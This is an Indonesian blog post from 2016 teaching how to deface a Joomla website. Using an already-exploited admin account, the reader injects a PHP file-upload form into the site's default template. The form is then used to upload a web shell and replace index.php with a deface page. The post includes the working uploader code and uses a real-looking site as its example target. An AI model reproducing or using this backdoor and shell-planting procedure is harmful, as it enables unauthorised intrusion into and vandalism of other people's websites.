Jumat, 28 Oktober 2016

Mendengar kata Menebas Index, itu terdengar kejam dan jahat. Saya sarankan untuk Anda yang memiliki website, segera tingkatkan keamanan website Anda karena banyak sekali cara untuk menemukan kelemahan web yang mungkin tidak Anda ketahui.

Saya ingatkan kepada Anda yang ingin belajar menebas Index.php dengan menanam shell, alangkah baiknya jika Anda akan mengganti script index dengan script deface Anda, Copy terlebih dahulu Script index pada web tersebut ke Notepad dan simpan. silahkan ganti script index dengan script deface Anda. Jika sudah berhasil, Saya sarankan untuk mengembalikan web seperti semula, dan script deface Anda Silahkan Ganti lagi dengan Script index.php website tersebut.

Sebelum memulai, Anda harus mempunyai shell untuk di Upload

 Download Shell
Download Shell


Login ke Administrator Website yang sudah Anda Exploit.
Masuk Ke Menu Template

Lihat Template Site yang sekarang menjadi Default ( Ada tanda bintangnya ). Kenudian Klik "Templates"
Klik Template Site yang menjadi Default
Pilih "Edit main page template"

Tambahkan Script Berikut diatas atau dibawah (terserah Anda) script template, Kemudian Save.

<?php
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Sukses!!!<b><br><br>'; }
else { echo '<b>Gagal Upload!!!</b><br><br>'; }
}
?>


Setelah Anda save, silahkan buka website tersebut, maka ada tampilan untuk mengupload file. Dan upload shell Anda.
Jika sudah, Tambahkan Nama Shell Anda pada URL Webnya. Misal: http://leansolutions.com.mx/shell.php. Selanjutnya Cari file index.php nya dan edit.
Setelah Anda selesai mengganti script index dengan script deface Anda, Silahkan "Save" dan lihat Hasilnya. 

[!] BERANI BERTINDAK, BERANI BERTANGGUNG JAWAB [!]
Demikian cara Menebas Index.php dengan menanam shell pada wesite Joomla.

Nitip Nickname : D.K.S.H

2 komentar: